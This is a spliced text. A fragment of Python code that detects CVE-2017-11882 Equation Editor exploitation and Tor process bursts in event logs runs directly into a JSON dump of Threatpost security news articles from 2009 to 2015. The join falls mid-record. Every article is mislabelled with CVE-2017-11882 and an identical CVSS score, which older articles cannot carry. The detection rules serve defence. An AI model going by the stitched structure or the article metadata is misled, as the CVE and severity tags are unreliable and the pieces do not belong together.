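    tor_pids_by_parent = defaultdict(set)   # parent image -> pids of tor.exe children
    tor_dests = defaultdict(set)            # tor.exe pid -> destination IPs
    for line in log_text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        image = _name(e["image"])
        if e["eid"] == 1:
            parent = _name(e["parent_image"])
            if parent == "eqnedt32.exe":
                # Equation Editor has no business starting programs: a child process
                # is the "download and run" step of the CVE-2017-11882 chain itself.
                alerts.append({"rule": "equation-editor-child-process", "severity": "high",
                               "pid": e["pid"], "cmdline": e["cmdline"]})
            elif image == "eqnedt32.exe":
                # Low on its own, since real equation objects start it too (until the
                # January 2018 Office update removed the component). Note the parent
                # is svchost.exe (DCOM launch), not WINWORD.EXE, so a rule keyed on
                # Word as the parent would never fire.
                alerts.append({"rule": "equation-editor-started", "severity": "low",
                               "pid": e["pid"], "parent": parent})
            if image == "tor.exe":
                tor_pids_by_parent[e["parent_image"]].add(e["pid"])
        elif e["eid"] == 3 and image == "tor.exe":
            tor_dests[e["pid"]].add(e["dst_ip"])
    for parent, pids in tor_pids_by_parent.items():
        if len(pids) >= tor_threshold:   # one tor.exe is Tor Browser; a burst is not
            dests = set().union(*(tor_dests[p] for p in pids))
            alerts.append({"rule": "multiple-tor-processes", "severity": "medium",
                           "parent": parent, "pids": sorted(pids),
                           "destinations": sorted(dests)})
    return alerts
```

Running detect(SAMPLE_LOG) produces the low-severity Equation Editor start, the high-severity cmd.exe child and the Tor burst with its three destinations; detect(BENIGN_LOG) produces only the low-severity note, which is the tuning point: on hosts patched after January 2018 that note can be promoted to high, because nothing legitimate should start the component any more.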
But the software giant did not consider the problem serious enough to warrant a patch, Sentrigo officials said, so the weakness has remained unpatched for nearly a year. Sentrigo has released a [free software tool](<http://www.sentrigo.com/passwords>) that will address the problem, though it does not patch the vulnerability.\n\nThe tool, called Passwordizer, erases the cleartext passwords from the database server\u2019s process memory.\n\nIn a statement, Microsoft officials said the company is not planning to patch the flaw and does not see it as a problem that requires a security update.\n\nThe flaw lies in the way that SQL Server handles user passwords. By looking at the process memory, an administrator can see other users\u2019 passwords in cleartext. However, in order to see the process memory dump, a user would have to have administrator rights already, a condition that limits the severity of the bug.\n\n\u201cDevelopers go to great lengths to ensure passwords are not even transmitted in clear text (for example at the time of login), let alone stored in a readable form. Users have come to expect that their personal passwords are exactly that \u2013 personal \u2013 and that not even administrators can see them. Exploiting this vulnerability, an administrator will be able to see the passwords of users and applications that have connected to SQL Server, all the way back to the last restart,\u201d said Slavik Markovich, CTO of Sentrigo. \u201cWe respectfully disagree with Microsoft\u2019s view that since it requires administrative privileges, the risk is mitigated. 
Even if you trust your admins, there are plenty of hackers capable of gaining escalated privileges, who could now easily access other systems across the network using these passwords.\u201d\n\nThe flaw can be exploited remotely in SQL Server 2000 and 2005, but in SQL Server 2008 Microsoft made a change to make it more difficult for administrators to access the memory, so an attacker would need local access to the machine in that case.\n", "cvss3": {}, "published": "2009-09-02T12:30:49", "type": "threatpost", "title": "New Unpatched Flaw Surfaces in SQL Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "href": "https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/73026/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:55", "description": "Dennis Fisher and Mike Mimoso talk about the end of the Patch Tuesday era for most Microsoft customers, the appeals court ruling on Section 215 metadata collection and Dennis\u2019s idea for a security industry commission.\n\nDownload: [digital_underground_201.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_201.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2015-05-08T12:12:40", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso on the End of the Patch Tuesday Era, Section 215 and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-08T16:39:21", "id": "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "href": "https://threatpost.com/threatpost-news-wrap-may-8-2015/112705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:55", "description": "The Internet 
Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.\n\nThe flaw affects nearly all IPv4 DHCP clients and relays and most servers, ISC said in its [advisory](<https://kb.isc.org/article/AA-01334>).\n\n\u201cA badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally,\u201d ISC said.\n\nDHCP, the Dynamic Host Configuration Protocol, automates the assignment of IP addresses and configuration information to hosts. It is used by all Windows clients and most Windows server deployments dating back to Windows 98.\n\nThe use of DHCP frees Windows administrators, for example, from manually configuring IP addresses for networked computers.\n\nISC added that servers, clients and relays built to process only unicast packets are not affected by this vulnerability, but cautioned that this is an unusual configuration.\n\n\u201cNot all potentially-affected builds will actually be affected, but because it is difficult to identify or predict those which should be upgraded, our advice is that all builds should be considered vulnerable,\u201d ISC said, adding that it is not aware of active exploits against this flaw.\n\nISC added that no workaround is available, but there are some measures that can be taken to limit the exposure of DHCP servers.\n\nAdmins are advised to upgrade immediately to DHCP version 4.1-ESV-R12-P1 or DHCP version 4.3.3-P1.\n", "cvss3": {}, "published": "2016-01-13T10:00:25", "type": "threatpost", "title": "DHCP Denial of Service Vulnerability Patched", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:35:27", "id": "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "href": "https://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": 
"2018-10-06T23:06:58", "description": "In this video, researchers Juliano Rizzo and Thai Duong demonstrate the technique they developed for stealing cryptographic keys for ASP.NET Web applications, enabling them to compromise virtually any app built on ASP.NET. \n\nYou can read the full story of their attack in this article, \u201c[Padding Oracle Attack Affects Millions of ASP.NET Apps](<https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/>).\u201d\n", "cvss3": {}, "published": "2010-09-17T17:48:52", "type": "threatpost", "title": "Demo of ASP.NET Padding Oracle Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:02", "id": "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "href": "https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/74485/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. 
\n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response team](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com].\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:07", "description": "The IDG News Service is reporting that Microsoft\u2019s latest round of security patches appears to be causing some PCs to seize up and display a black screen, rendering the computer useless. The problem affects Microsoft products including Windows 7, Vista and XP operating systems.\n\nFrom the article:\n\nMicrosoft apparently made changes to the Access Control List (ACL), a list of permissions for a logged-on user. The ACL interacts with registry keys, creating visible desktop features such as a sidebar.\n\nHowever, the latest patches appear to make some changes to those registry keys. 
The effect is that some installed applications aren\u2019t aware of the changes and don\u2019t run properly, causing a black screen.\n\n[Read the full story](<http://www.computerworld.com/s/article/9141568/Latest_Microsoft_patches_cause_black_screen_of_death?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-11-30T15:38:43", "type": "threatpost", "title": "Latest MS Patches Causing Black Screen of Death", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:03:25", "id": "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "href": "https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/73168/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:13", "description": "In part two of his lecture on exploiting Microsoft Windows, Dino Dai Zovi discusses specific techniques for attacking Windows machines.\n", "cvss3": {}, "published": "2009-11-16T16:24:46", "type": "threatpost", "title": "Windows Exploitation Part 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:24:32", "id": "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "href": "https://threatpost.com/windows-exploitation-part-2-111609/73105/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "description": "Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. 
The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November Patch Tuesday release. The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%\\syswow64\\t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "cvss3": {}, "published": "2011-11-04T11:47:32", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:25", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Today is Patch Tuesday, the 11-year-old procession of security bulletins from Microsoft streamed out automatically to consumers of Windows Update, and pulled en masse by enterprise admins worldwide needing to test each for compatibility.\n\nThis is how it\u2019s been done since shortly after Bill Gates\u2019 Trustworthy Computing memo in 2002 set Microsoft on its course of secure software 
development. But in 2015, as the concept approaches adolescence, are we asking the right questions about the viability of a scheduled patch delivery?\n\nSure, enterprises may be ingrained in this rote consumption of security fixes on the second Tuesday of every month, but given that Microsoft is in the middle of a personality overhaul under new CEO Satya Nadella with a vigorous focus on the cloud, and the company\u2019s [vaunted Trustworthy Computing group disbanded as a single entity](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and migrated into several business units inside Microsoft, Patch Tuesday may be showing some signs of cracking.\n\nOutside forces aren\u2019t helping much. Zero days dominate the headlines, but affect relatively few until attacks find their way into exploit kits, turning specialized hacks into commodity danger. Google\u2019s Project Zero is the most recent conspirator undermining the value of regular patching cycles; the research team has put vendors on notice that a [90-day countdown](<http://threatpost.com/round-2-google-deadline-closes-on-pair-of-microsoft-vulnerabilities/110474>) starts the second a vulnerability is reported to Microsoft\u2014or any vendor for that matter. And once the 90 days are up, disclosure is full and angst is high.\n\n**Patch Quality in Crosshairs**\n\nInternally, since TWC in September was integrated into Microsoft\u2019s cloud and enterprise group\u2014coinciding with more than 2,100 layoffs, including several key security people\u2014eyebrows have also been raised about patch quality and timeliness. Most notably, a critical vulnerability in Microsoft\u2019s SChannel, the SSL/TLS implementation in Windows, was patched in November but within days, the patch was pulled back because of [issues with TLS negotiations](<http://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>). 
It was re-issued in short order, but coincidentally or not, the situation did not endear anyone to the reorg going on in Redmond.\n\nEven going into today\u2019s Patch Tuesday release, a critical [cross-site scripting vulnerability in Internet Explorer affecting Windows 7 and 8.1](<http://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>) users that last week was made public along with proof-of-concept code, still is unpatched and Microsoft has been silent on when a fix is coming. That silence could, in part, be due to the fact that the company recently [discontinued providing users with advanced notification of patches](<http://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>), making them available only to premier support customers. Perhaps security will stop being a marketing differentiator for Microsoft.\n\n\u201cThey\u2019re not going to get rid of security, but like Apple, put it more behind the scenes,\u201d said Marc Maiffret, a longtime Windows bug-hunter and current CTO at BeyondTrust. \u201cIt\u2019s not going to be the thing they talk about most. It distracts from them being a software and technology company.\u201d\n\nMicrosoft\u2019s QA testing of patches is extensive and reportedly separate from the Microsoft Security Resource Center (MSRC) and TWC, which focuses on security research, threat modeling and risk management. Updates are tested against a variety of application and operating system environments for compatibility issues and must meet strict deadlines to be included in a timely fashion in Windows Update. Patches are also tested against third-party applications, and Microsoft will insist that patch quality issues have little to do with TWC changes and more to do with advanced and changing threats.\n\n\u201cMicrosoft carefully reviews and tests each security update to ensure its quality and that it has been thoroughly evaluated for application compatibility. 
There are many factors that can impact the length of testing,\u201d said Chris Betz of the MSRC in a statement provided to Threatpost. \u201cOnce the update is built, it must be tested with the different operating systems and applications it affects, then localized for the different markets and languages around the world. In some instances, multiple vendors are affected by the same or similar issues, which requires a coordinated release.\u201d\n\nMicrosoft\u2019s focus on delivering a consistent schedule of patches helps users inside the enterprise and smaller organizations line up their deck chairs, do compatibility testing and control patch rollouts. These processes are finely tuned compared to a decade ago, and most organizations would not trade Patch Tuesday for, say, automatic silent patching a la Google\u2019s updates to Chrome, experts said.\n\n\u201cThe bigger factor that surrounds things like Patch Tuesday is that threats have changed,\u201d Maiffret said. \u201cOrganizations like governments or anyone who is a high-value target, has a good chance of getting hit with a zero day, which Patch Tuesday has no bearing on, at least up front. That\u2019s a big part of it: security moving away from the value of one individual vulnerability.\u201d\n\n**Automatic Patching Has Its Place**\n\nMicrosoft, for its part, has not been stagnant with patching. New services such as [myBulletins](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>) and a revamped Exploitability Index help customers make deployment decisions, while its partner programs such as the Microsoft Active Protections Program give participating enterprises and vendors a heads-up on vulnerability details in order to coordinate patch delivery with interdependent products.\n\n\u201cEach customer is unique with varying needs based on their technology environments. 
With the evolution of cloud computing, more and more customers are taking advantage of the real time updates we provide,\u201d said Betz. \u201cCustomers are also increasingly taking advantage of Microsoft Update to automatically provide updates.\u201d\n\nAttackers have the luxury of being able to focus on one bug, but defenders have to look at the biggest risks to their respective environments, hoping they make the right assessments and prioritizations. And this goes well beyond Microsoft to third-party applications such as Flash, Java and others that run everywhere and have been providing attackers with much more tempting targets of late. Yet with the world primarily still running on Windows, especially in smaller organizations, patch quality still gives people pause with regard to going to an automated process.\n\n\u201cI think people would like to be in automatic mode. There\u2019s a huge value to set-it-and-forget-it, but there\u2019s still a risk involved and it\u2019s difficult for people to consume that risk not knowing what could happen,\u201d said Andrew Storms, vice president of security services at New Context, and former security executive at CloudPassage and nCircle. \u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time; if I were a CIO, I would be drooling.\u201d\n\nThat, of course, depends on patches that are good to go out of the box, so to speak.\n\n\u201cAny business at the scale of Google or Microsoft has so many complexities that there are going to be unforeseen interactions,\u201d said Tripwire security researcher Craig Young. \u201cThat\u2019s why enterprises test patches in a controlled environment to make sure they don\u2019t breach critical business applications before rolling them out to systems. That works. 
The Chrome model is probably not appropriate if you\u2019re a hospital where all your terminals need a web app interface with insurance providers and if Microsoft updates IE and the web app no longer renders properly, how would you address that situation?\u201d\n\n**Environment to Dictate Patching Styles**\n\nKatie Moussouris, a former lead security strategist at Microsoft and current chief policy officer at HackerOne, was deeply involved in the development of Microsoft\u2019s coordinated disclosure program and developing strong relationships with vulnerability researchers and brokers. She says vendors need to sharpen patch development where quality and speed go hand in hand. This takes on more relevance with the so-called Internet of Things, where embedded computers often don\u2019t have simple patching mechanisms yet play critical roles in manufacturing, health care and personal environments.\n\n\u201cPatching style is something that definitely has to evolve as what makes up the bulk of internet traffic starts changing,\u201d Moussouris said. \u201cMobile devices are difficult to patch, and are not patched on anyone\u2019s schedule. Many are not designed to be patched either; they\u2019re designed to be upgraded or thrown away in two years.\u201d\n\nMicrosoft, meanwhile, has taken steps to [make exploitation more difficult for attackers](<http://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876>). The introduction of memory corruption mitigations such as ASLR and DEP into Windows and Internet Explorer has made buffer overflow vulnerabilities less of a hassle than a decade ago. 
Free tools such as the [Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) are often a stopgap for zero-day vulnerabilities until Microsoft can release a scheduled or out-of-band security bulletin.\n\n\u201cMicrosoft has focused on a higher level of mitigations, knowing how high to raise the bar to make exploitation really hard,\u201d Maiffret said. \u201cI hope they keep their eye on mitigations, not just EMET but also the underlying operating system.\u201d\n\nFor the time being, Microsoft won\u2019t retire Patch Tuesday and its high-paying enterprise customers likely won\u2019t let them. And in the end, Patch Tuesday is still relevant on many fronts, and the processes are still superior to many third-party patching processes.\n\n\u201cStepping back, you have to ask: \u2018What\u2019s the relevance of Microsoft vulnerabilities in attacks and exploits?'\u201d Maiffret said. \u201cMicrosoft software is still relevant and part of targeted attacks; you still see IE targeted attacks happening, but at the same time, you\u2019re seeing an increase of third-party apps in targeted attacks. That\u2019s the biggest shift. Microsoft is slightly putting security in the back seat, not doing less internally, but in visibility. 
That mirrors what\u2019s happening from the attackers\u2019 perspective; it\u2019s just as important to find a Flash or Java vulnerability versus a Microsoft vulnerability.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:49", "type": "threatpost", "title": "Creaking Patch Tuesday's Viability Rests with Quality, Speed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-11T12:02:27", "id": "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "href": "https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:58", "description": "[](<https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/>)Windows 8 isn\u2019t yet a week old, but the scammers and phishing crews already are taking their swings at it, setting up new campaigns based on the shiny new operating system. Security researchers have identified a new scareware campaign playing off of the Windows 8 launch, as well as a phishing email trying the same tack.\n\nThe public release of Windows 8 was just last Friday, Oct. 26, and most people probably haven\u2019t even seen the OS in person yet. But that\u2019s not stopping the scammers from trying to make a buck off the back of Microsoft\u2019s work. This shouldn\u2019t come as a surprising development, given that these crews use virtually every major news event, natural disaster and celebrity scandal as a money-making opportunity. \n\nThis time, the Windows 8 launch has inspired a new strain of scareware\u2013surely not the last\u2013that purports to be the \u201cWin 8 Security System\u201d and, of course, warns victims about a series of non-existent threats on their PCs. 
The scareware shows users a warning, telling them that their machines are infected and informing them that they should register their copy of the scareware in order to see what the threats are and remove them, according to an [analysis from Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/theyre-here-threats-leveraging-windows-8/>).\n\nUsers often will come across these fake antivirus or scareware threats on either compromised legitimate Web sites or malicious sites. Scammers will try to compromise popular legitimate sites, such as news sites, social media sites and others and insert some malicious code onto the sites. When users visit a compromised site, they may see a pop-up window telling them that their machine is infected. Usually, clicking on any link in the pop-up will download the scareware, which could then require a payment of $50 or $100 in order to remove it.\n\nScammers rely on users searching for popular terms, such as Windows 8, in order to land on the malicious sites they control, so they tie their campaigns to trending terms. The researchers at Trend Micro also came across a phishing campaign that\u2019s tied to Windows 8, trying to goad them into downloading a free copy of the new OS. Rather than a free version of Windows 8, the victim gets a request for their personal data, including name, email and other details. 
\n\nTo be clear, the only way you\u2019re getting Windows 8 for free is when you buy a new PC or tablet.\n", "cvss3": {}, "published": "2012-11-01T15:32:54", "type": "threatpost", "title": "Scareware and Phishing Scams Play on Windows 8 Launch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:18", "id": "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "href": "https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/77176/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:05", "description": "[](<https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/>)A prominent researcher will use an upcoming security conference in Buenos Aires to demonstrate an exploit that allows hackers to bypass the Windows Service Isolation feature, despite Microsoft\u2019s efforts to close the security loophole.\n\nSecurity researcher Cesar Cerrudo of [Argeniss Information Security and Software](<http://www.argeniss.com/>) said he will demonstrate an exploit he has developed that would allow hackers to bypass a security feature called Windows Service Isolation, which is intended to make it easier to access Windows objects without requiring administrator-level privileges. Cerrudo will use the upcoming ekoparty Security Conference in Buenos Aires to present his exploit. \n\nWriting to Threatpost.com, Cerrudo said that his presentation will demonstrate a method to bypass the Windows Service Isolation feature, allowing an attacker who is able to upload content to a Windows endpoint running applications such as SQL Server and Internet Information Server (IIS) to elevate her privileges from the limited Local Service or Network Service account to the Local System account, providing broad access to install malicious code on or otherwise modify the system. 
\n\n\u201cFor instance it will allow you to compromise a Windows system if you can upload content to IIS or exploit any process running under (the) Network Service or Local Service account,\u201d Cerrudo wrote.\n\nThe demonstration, if successful, will poke a hole in a protection plan that Microsoft has proposed for the privilege escalation problem \u2013 part of a larger body of research on privilege escalation problems affecting all flavors of Windows that Cerrudo has documented in his paper \u201c[Token Kidnapping\u2019s Revenge](<http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf>).\u201d \n\nThe tendency to run popular services with administrator-level privileges has been exploited in the past to install malicious programs on Windows systems. Microsoft added the Windows Service Isolation feature as a configuration option for companies that wanted to harden Windows servers and clients against attack. \n\nMicrosoft has responded to the problems raised by Cerrudo and others with a security update to the Windows Tracing Feature for Services, MS10-059 for Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. The company also [issued a security advisory](<http://www.microsoft.com/technet/security/advisory/2264072.mspx>) for the Windows Service Isolation issue, which provides workarounds for Windows customers running Internet Information Server as well as a security fix for the privilege escalation problem that involves applying an update to the Windows Telephony API. \n\nCerrudo said that the configuration changes suggested by Microsoft will protect Windows machines running IIS, but not other applications. Windows shops that don\u2019t apply the security fix suggested are vulnerable to privilege escalation attacks if they\u2019re running other applications on affected systems. 
He suggests that Microsoft update its advisory to make it clear that the security fix described in the advisory is a requirement for any customer running applications other than IIS on affected systems. \n\nMicrosoft said it feels confident that its patch and advisory adequately cover the possible attacks that Cerrudo will demonstrate. Jerry Bryant, Group Manager, Trustworthy Computing, Microsoft said that its security advisory addresses \u201cthe potential for attacks that leverage the Windows Service Isolation feature by helping to clarify the proper use and limits of the Windows Service Isolation feature.\u201d However, the company notes that the Windows Service Isolation is a \u201cdefense-in-depth feature, not a proper security boundary\u201d and shouldn\u2019t be treated as such. \n", "cvss3": {}, "published": "2010-09-02T04:28:26", "type": "threatpost", "title": "Researcher Will Demo Bypass of Windows Service Isolation Feature", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:06:25", "id": "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "href": "https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/74416/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:52", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060714/katie_moussouris2.jpg>)Dennis Fisher talks with Katie Moussouris of Microsoft about her childhood exploits with Commodore 64 programming, ignoring her Barbies, growing up as a hacker, her days as a pen tester and the challenges of working on security at Microsoft.\n\nDownload: [12_moussouris.mp3](<http://traffic.libsyn.com/digitalunderground/10_moussouris.mp3>)\n\n_*Microsoft image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream, Creative Commons_\n", "cvss3": {}, "published": "2013-11-04T09:00:25", 
"type": "threatpost", "title": "How I Got Here: Katie Moussouris", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-04T19:16:25", "id": "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "href": "https://threatpost.com/how-i-got-here-katie-moussouris/102784/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:27", "description": "LAS VEGAS \u2013 Windows Server Update Services (WSUS) is your friend, if you run an enterprise IT shop, because it facilitates the download and distribution of security patches, service pack installations and hardware driver updates among others.\n\nTwo researchers this week at the Black Hat conference, however, point out that WSUS can be a significant weakness that can lead to the complete compromise of any server or desktop in an organization hooked up to the automated update service.\n\nPaul Stone and Alex Chapman of Context Information Security in the U.K. took a long look at the WSUS attack surface and discovered that when a WSUS server contacts Microsoft for driver updates, it does so using XML SOAP web services, and those checks are not made over SSL. While updates are signed by Microsoft and updates must be verified by Microsoft, Stone and Chapman discovered that an attacker already in a man-in-the-middle position on a corporate network, for example, could with some work tamper with the unencrypted communication and inject a malicious homegrown update.\n\nWhile turning on SSL during the initial WSUS configuration mitigates the situation, there are organizations that may skip this crucial\u2014and last step\u2014of the WSUS setup. 
